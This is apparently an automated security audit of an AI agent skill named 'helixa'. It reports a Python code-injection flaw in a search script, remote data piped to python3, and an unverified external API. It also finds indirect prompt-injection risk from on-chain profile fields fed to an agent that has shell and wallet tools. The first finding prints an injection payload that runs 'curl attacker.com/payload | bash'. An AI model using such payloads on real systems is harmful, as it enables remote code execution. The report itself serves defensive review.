helixa

Fail

Audited by Gen Agent Trust Hub on Mar 22, 2026

Risk Level: HIGH

Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The script scripts/helixa-search.sh is vulnerable to Python code injection. It takes a user-supplied search query and interpolates it directly into a python3 -c command string using single quotes. A crafted query containing a single quote and malicious Python code (e.g., '); import os; os.system('curl attacker.com/payload | bash'); print(') will execute the injected code on the host system.
  • [REMOTE_CODE_EXECUTION]: Automated security scans identified a pattern in scripts/check-cred.sh where data fetched from https://api.helixa.xyz/api/v2/cred/${AGENT_ID} is piped directly to the python3 interpreter. While the script currently targets the json.tool module (which only parses and pretty-prints JSON), a compromise of the remote endpoint or any change to the pipeline that feeds the response to the interpreter itself could allow a malicious server to execute arbitrary code.
  • [EXTERNAL_DOWNLOADS]: The skill makes frequent requests to api.helixa.xyz to retrieve agent profiles, statistics, and reputation data. This domain is an external resource not identified as a trusted service, representing a dependency on non-verified infrastructure for core functionality.
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection (Category 8) due to the handling of external data.
    • Ingestion points: User-generated on-chain content such as agent "narratives", "traits", and "personality" fields are ingested from api.helixa.xyz via helixa-agent.sh and helixa-search.sh.
    • Boundary markers: There are no delimiters or explicit instructions to the agent to ignore embedded commands within these fields when processing them.
    • Capability inventory: The agent has access to powerful tools including network requests (curl), shell execution, and cryptocurrency wallet operations (cast).
    • Sanitization: No programmatic sanitization or validation is performed on the retrieved content; the skill relies solely on a textual warning in the security section of SKILL.md.
  • [COMMAND_EXECUTION]: Multiple scripts execute shell commands (curl, cast) using variables derived from user input or remote API responses without robust validation, increasing the risk of command argument injection.
Recommendations
  • HIGH: Downloads and executes remote code from https://api.helixa.xyz/api/v2/cred/${AGENT_ID}. DO NOT USE without thorough review.
  • AI detected serious security threats
Audit Metadata

Risk Level: HIGH

Analyzed: Mar 22, 2026, 09:46 PM